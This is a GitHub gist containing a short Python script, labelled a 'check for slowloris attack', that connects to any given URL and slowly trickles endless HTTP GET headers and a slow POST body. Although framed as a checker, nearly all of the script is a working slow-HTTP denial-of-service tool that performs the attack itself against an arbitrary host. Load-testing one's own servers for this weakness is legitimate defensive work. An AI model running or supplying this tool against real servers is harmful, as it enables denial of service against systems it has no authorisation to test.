Created
January 31, 2020 00:24
-
-
Save gcmurphy/82132e2e89c7132c59431ca7304177b8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import datetime | |
| import random | |
| import socket | |
| import ssl | |
| import string | |
| import time | |
| import traceback | |
| from urllib.parse import urlparse | |
| from pprint import pprint | |
| def rand_str(length): | |
| s = '' | |
| for i in range(length): | |
| s += random.choice(string.ascii_letters) | |
| return s | |
| def run_post_check(host, port, delay, use_ssl): | |
| print("Slowly sending POST data...") | |
| print("Host: " + host) | |
| print("Port: " + str(port)) | |
| print("SSL Mode: " + str(use_ssl)) | |
| print("Start time: " + time.ctime()) | |
| start = datetime.datetime.now() | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| if use_ssl: | |
| s = ssl.wrap_socket(s) | |
| s.connect((host, port)) | |
| s.send(b"POST / HTTP/1.1\r\n") | |
| s.send(b"Accept: */*\r\n") | |
| s.send(b"Connection: keep-alive\r\n") | |
| s.send(b"Content-Length: 999999\r\n") | |
| s.send(b"\r\n") | |
| for i in range(1, 1000000): | |
| s.send("{}={}&".format(rand_str(8), rand_str(4)).encode('utf-8')) | |
| time.sleep(delay) | |
| s.close() | |
| except Exception as err: | |
| traceback.print_exc() | |
| print(err) | |
| finally: | |
| print("Finished time: " + time.ctime()) | |
| duration = datetime.datetime.now() - start | |
| print(f"{duration.seconds} seconds elapsed") | |
| def run_get_check(host, port, delay, use_ssl): | |
| print("Slowly sending GET request headers..") | |
| print("Host: " + host) | |
| print("Port: " + str(port)) | |
| print("SSL Mode: " + str(use_ssl)) | |
| print("Start time: " + time.ctime()) | |
| start = datetime.datetime.now() | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| if use_ssl: | |
| s = ssl.wrap_socket(s) | |
| s.connect((host, port)) | |
| s.send(b"GET / HTTP/1.1\r\n") | |
| s.send(b"Accept: */*\r\n") | |
| s.send(b"Connection: keep-alive\r\n") | |
| while True: | |
| s.send("X-a: {}\r\n".format(rand_str(64)).encode("utf-8")) | |
| time.sleep(delay) | |
| s.close() | |
| except Exception as err: | |
| traceback.print_exc() | |
| print(err) | |
| finally: | |
| print("Finished time: " + time.ctime()) | |
| duration = datetime.datetime.now() - start | |
| print(f"{duration.seconds} seconds elapsed") | |
| def main(): | |
| parser = argparse.ArgumentParser(description="check for slowloris attack") | |
| parser.add_argument("--url", required=True, help="url check") | |
| parser.add_argument("--delay", default=5, type=int, help="delay between characters sent in body") | |
| args = parser.parse_args() | |
| parts = urlparse(args.url) | |
| netloc = parts.netloc.split(":") | |
| if len(netloc) > 1: | |
| host, port = netloc | |
| port = int(port) | |
| else: | |
| host = netloc[0] | |
| port = 443 if parts.scheme == 'https' else 80 | |
| run_get_check(host, port, args.delay, parts.scheme == 'https') | |
| run_post_check(host, port, args.delay, parts.scheme == 'https') | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment